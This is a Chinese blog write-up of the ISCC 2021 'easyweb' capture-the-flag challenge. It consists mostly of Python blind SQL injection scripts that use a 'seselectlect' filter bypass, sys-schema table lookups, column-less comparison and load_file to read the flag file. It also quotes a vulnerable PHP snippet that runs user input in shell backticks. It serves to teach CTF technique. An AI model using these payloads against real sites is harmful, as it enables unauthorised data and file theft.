iscc2021 easyweb

最新推荐文章于 2022-07-07 19:54:42 发布
最新推荐文章于 2022-07-07 19:54:42 发布
阅读量718 收藏 3
点赞数
分类专栏: wp 文章标签: wp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/woshilnp/article/details/117234965
版权

iscc2021 easyweb

考点:无列名sql盲注

payload:

import requests

url = "http://39.96.91.106:5001/?id="

result = ""
i = 0

while (True):
    i = i + 1
    head = 32
    tail = 127

    while (head < tail):
        mid = (head + tail) >> 1

        payload = "1'and!!!!if(ascii(substr(database(),{},1))>{},1,0)%23".format(i,mid)#iscc_web
        #payload = "1'and!!!!if(ascii(substr(version(),{},1))>{},1,0)%23".format(i,mid)   5.7.33-0ubuntu0.16.04.1
        r = requests.get(url + payload)
        r.encoding = "utf-8"
        # print(url+payload)
        if "Your Login name" in r.text:
            head = mid + 1
        else:
            # print(r.text)
            tail = mid

    last = result

    if head != 32:
        result += chr(head)
    else:
        break
    print(result)

但是发现过滤了or,所以无法使用information_schema数据库来爆破库、表、列、数据了,查看版本,5.7.33,存在sys数据库

所以可以利用sys数据库查出表名,这里很坑的就是它把select过滤了,但是他不告诉你,回显不是die,而是正常返回值,需要使用双写绕过seselectlect

import requests

url = "http://39.96.91.106:5001/?id="

result = ""
i = 0

while (True):
    i = i + 1
    head = 32
    tail = 127

    while (head < tail):
        mid = (head + tail) >> 1

        payload = "0%27||if(ascii(substr((seselectlect%0dgroup_concat(table_name)%0dfrom%0dsys.schema_table_statistics_with_buffer%0dwhere%0dtable_schema=database()),{},1))>{},1,0)%23".format(i,mid)#easyweb,iscc_flag
        r = requests.get(url + payload)
        r.encoding = "utf-8"
        # print(url+payload)
        if "Your Login name" in r.text:
            head = mid + 1
        else:
            # print(r.text)
            tail = mid

    last = result

    if head != 32:
        result += chr(head)
    else:
        break
    print(result)

然后就是无列名盲注了

我想用0%27||if(ascii(substr((seselectlect*from%0d(seselectlect%0d*%0dfrom%0discc_flag%0das%0da%0djoin%0discc_flag%0db)c),1,1))>1,1,0)%23注入,但是发现好像不行,

无列名盲注如下:

核心payload如下

id="1'and((select 1,{})>(select * from(iscc_flag)))%23".format(hexchar)

假设 flag 为 flag {bbbbb},对于 payload 这个两个 select 查询的比较,是按位比较的,即先比第一位,如果相等则比第二位,以此类推;在某一位上,如果前者的 ASCII 大,不管总长度如何,ASCII 大的则大,

在这样的按位比较过程中,因为在里层的 for() 循环,字典顺序是从ASCII码小到大来枚举并比较的,假设正确值为b,那么字典跑到b 的时候b=b不满足payload的大于号,只能继续下一轮循环,c>b此时满足了,题目返回真,这个时候就需要记录flag的值了,但是此时这一位的charc,而真正的flag的这一位应该是b才对,所以flag += chr(char-1),这就是为什么在存flag时候要往前偏移一位的原因,payload如下:

import requests
url = 'http://39.96.91.106:5001/?id='

def trans(flag):
    res = ''
    for i in flag:
        res += hex(ord(i))
    res = '0x' + res.replace('0x','')
    return res

flag = ''
for i in range(1,500): #这循环一定要大 不然flag长的话跑不完
    hexchar = ''
    for char in range(32, 126):
        hexchar = trans(flag+ chr(char))
        payload = "0'||((seselectlect%0d1,{})>(seselectlect%0d*%0dfrom%0discc_flag))%23".format(hexchar)
        r = requests.get(url+payload)
        text = r.text
        if 'Your Login name' in r.text:
            flag += chr(char-1)
            print(flag)
            break

hex() 操作,这是因为 MySQL 遇到 hex 会自动转成字符串

得到CCCMD.PHP

<?php


if(isset($_GET['c'])){
  $c=$_GET['c'];

    if(preg_match("/[zxcvbMnlkjhgfsaoiuytreq]+|[ZXCVBNLKKJHGFSAOIUYTREQ]+|[0123456789]+|\(|\/|\*|\-|\+|\.|\{|\}|\[|\]|\'|\"|\?|\>|\<|\,|\)|\(|\&|\^|\%|\#|\@|\!/", $c)){
       exit("die!!");
    }else{
     echo `$c`;
    }
}else{
    highlight_file(__FILE__);
}
?>
<!--flllllllllaaag.php-->

这里发现好像不能执行命令,但是我们SQL语句也可以使用load_file读取文件内容,试一试,没被过滤

执行pwd命令,得到当前路径/var/www/const

脚本如下:

import requests

url = "http://39.96.91.106:5001/?id="

result = ""
i = 0

while (True):
    i = i + 1
    head = 32
    tail = 127

    while (head < tail):
        mid = (head + tail) >> 1

        payload = "0%27||if(ascii(substr((seselectlect%0dhex(load_file(0x2f7661722f7777772f636f6e73742f666c6c6c6c6c6c6c6c6c616161672e706870))),{},1))>{},1,0)%23".format(i,mid)
        r = requests.get(url + payload)
        r.encoding = "utf-8"
        # print(url+payload)
        if "Your Login name" in r.text:
            head = mid + 1
        else:
            # print(r.text)
            tail = mid

    last = result

    if head != 32:
        result += chr(head)
    else:
        break
    print(result)

得到:

3C3F7068700D0A24666C61673D22697363637B65656565656173795F77656221213636363636367D223B0D0A3F3E

16进制解密,得到:

<?php
$flag="iscc{eeeeeasy_web!!666666}";
?>
w0s1np
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ISCCWebEasy-SQL
Pai_Space
05-25 2380
select 等被过滤,绕不过 id=1 至 8 有一些信息 id=8 时 用 sqlmap 可以查到数据库是 Mysql 8 Mysql 8 存在 table 注入 浅谈利用mysql8新特性进行SQL注入 - 安全客,安全资讯平台 测是否存在 http://59.110.159.206:7010/?id=-1 union table users limit 0,1 存在,可以利用,由于 id=8 时提示查邮件,看看是否存在 email 回显了 email,查 b
iscc-2022
zhhhb1005的博客
06-05 1008
分析题目,info被强制转换成为数组,get传参 information ,同时要满足step1和step2才能得到flag。step1要求year=2022step2要求item为三个值的数组,第一个值为数组payload pop2022 看开头意思是如果使用get的wish传参那么就反序列化这个wish,如果不是则显示源代码。 流程 exp payload: get传参,然后将结果base64解密。 访问/ypHeMPardErE.zip ,得到源码 这⾥之前可以判断
2022ISCC-web-wp
Christ1na的博客
07-07 2494
2022ISCC-web-wp
ISCC 2021 WP
夏日 の blog
05-25 7121
MISC 李华的红包 打开发现是一个图片,binwalk分离下文件后得到一个txt文件,内容如下 24,43,13,13,12,21,43 很明显是敲击码(如果改下图片大小为521*521会看到下面有个鼓也会提示这是敲击码) 分别对应着ISCCBFS ISCC{ISCCBFS} Retrieve the passcode 解压后得到一个压缩包和一个名为scatter的txt文档 打开txt文档发现 1:3:1;1.25:3:1;1.5:3:1;1.75:3:1;2:3:1;2:2.75:1;2:2.5
ISCC2021-Web01
一个普普通通的博客
05-19 467
正则匹配最后的倔强,那我倒要看看有多倔强 打开链接 Why don't you take a look at robots.txt? 行,爷这回听你的 又来??? 行,爷还听你的 这里我刚开始出错了,把/src也给整上了,迷惑了好半天,罪过 审计后发现,密码在这藏着呢 ...
ISCC2021-MISC部分题目.zip
08-07
ISCC2021-MISC部分题目.zip是一个与ISCC(International Symposium on Computer Science and Convergence,国际计算机科学与融合大会)相关的压缩包文件。这个压缩包可能包含了该会议的多份论文、研究报告或者竞赛...
ISCC2021线上赛赛题.zip
05-19
ISCC2021线上赛赛题.zip wp见主页
ISCC2022题目附件
06-06
2022ISCC所有题目附件,包含ISCC2022-练武题附件和ISCC2022-擂台题附件 信息安全已涉及到国家政治、经济、文化、社会和生态文明的建设,信息系统越发展到它的高级阶段,人们对其依赖性就越强,从某种程度上讲其越...
CTF,ISCC各个隐写总结
08-29
ISCC( Invisible Steganographic Communication Challenge)是其中专注于隐写术的一个专门比赛。隐写术是一种信息隐藏技术,它允许数据被嵌入到各种媒体文件中,如图片、音频或视频,而不易被察觉。这篇总结将深入...
ISCC题库.docx
05-23
ISCC2020比赛题库 ISCC ISCC ISCC ISCC
2021-3-15 misc+web
探针一号的博客
03-15 302
[BJDCTF 2nd]小姐姐-y1ng 是这样的,馋她身子,但是为什么,这里被切了一刀 。。。一千年以后。。。 是我多虑了 以后不要只搜索flag了 呜呜呜 [BJDCTF 2nd]圣火昭昭-y1ng 我去,在属性里 找得我猝不及防 与佛论禅,没参透。。。 搜了半天找到个新佛曰的,这回参透了 http://hi.pcmoe.net/buddha.html 解密出gemlovecom,按提示去掉com,交flag 失败,知道为啥失败吗? 因为太菜了(笑哭) 有一款隐写工具outguess 这里是安装
ISCC 2022
njh18790816639的博客
06-13 4843
sim_treasure 简单的32位循环格式化字符串漏洞,位于栈上,无过滤\x00; from pwn import * context(log_level='debug',os='linux',arch='i386') binary = './sp1' r = remote('123.57.69.203',7010) #r = process(binary) elf = ELF(binary) #libc = elf.libc libc = ELF('./libc-2.27.so') offset
2021ISCC 部分web writeup
鸣蜩十四的博客
05-30 297
ISCC客服冲冲冲(一) 在这道题目中让左边的票数超过右边的票数,我第一反应是写一个脚本刷票,而且看起来没有限制ip多次投票,所以写了一个比较简单的python自动点击投票 from selenium import webdriver driver = webdriver.Chrome("C:\Program Files (x86)\Google\Chrome\Application\chromedriver.exe") driver.get("http://39.96.91.106:7020/test
easyui table select 下拉框做status状态区分
JesseCary的博客
07-12 1285
function searchSaleChance(){ $("#dg").datagrid('load',{ "customerName":$("#s_customerName").val(),  "overView":$("#s_overView").val(),  "createMan":$("#s_createMan").val(),  "state":$("#s_state")
ISCC2021-MISC_小明的表情包-WP
qq_42667177的博客
05-25 2277
附件下载下来是个压缩包,并且需要解压密码。 题目中给了提示凯撒密码“AVARGRRA AVARGL AVAR”是其出生年份,且说密码应该为出生日月年。 1、先解密该凯撒密码: 在bugku的在线工具上选择凯撒解密工具; 这里我们用枚举解密,然后观察到一行“NINETEEN NINETY NINE”即1999 2、知道了年份后还差月和日,这里我选择用字典爆破来破解解压密码。 (1)、首先制作字典: 易得C++脚本如下: #include <bits/stdc++.h> using namesp.
[CISCN2021]easy_sql|Ciyaso
Ciyaso的博客
05-17 413
easy_sql|Ciyaso 1.首先用sqlmap跑 得知了 库名security 继续跑发现了两个表users和flag 然后得知 users下有三个列id,password,username flag下有两列,id和一个没有列名的列 2.然后对 url 进行post注入,发现可以使用报错注入 admin') AND (SELECT 2155 FROM (SELECT(SLEEP(5-(IF(ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS N
ISCC-2022
ki10Moc的博客
06-06 3788
pyccwp
ISCC2021
sparename的博客
05-26 795
MSIC李华的红包Retrieve_the_passcode海市蜃楼1美人计ISCC客服一号冲冲冲(一)这是啥Web01 李华的红包 打开得到一张半张图片 题目其实有提示,将图片大小改为521*521,可以看到下面有一个鼓,对应敲击,将图表格式改为rar,看见haobao.txt文件,打开数字为24,43,13,13,12,21,43,猜测为敲击码 得ISCC{ISCCBFS} Retrieve_the_passcode 下载压缩文件查看有下面文件和一个加密的PDF 根据数据画出图片散点图如下: 输入密
ISCC where
最新发布
09-08
ISCC是指"Intelligent Self-Configuring Cluster",其中的"ISCC"表示智能自配置集群。在ISCC中,有两种集群形式,一种是分散式集群,另一种是集中式集群。在分散式集群中,每个节点都有潜力成为簇头,而在集中式集群...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值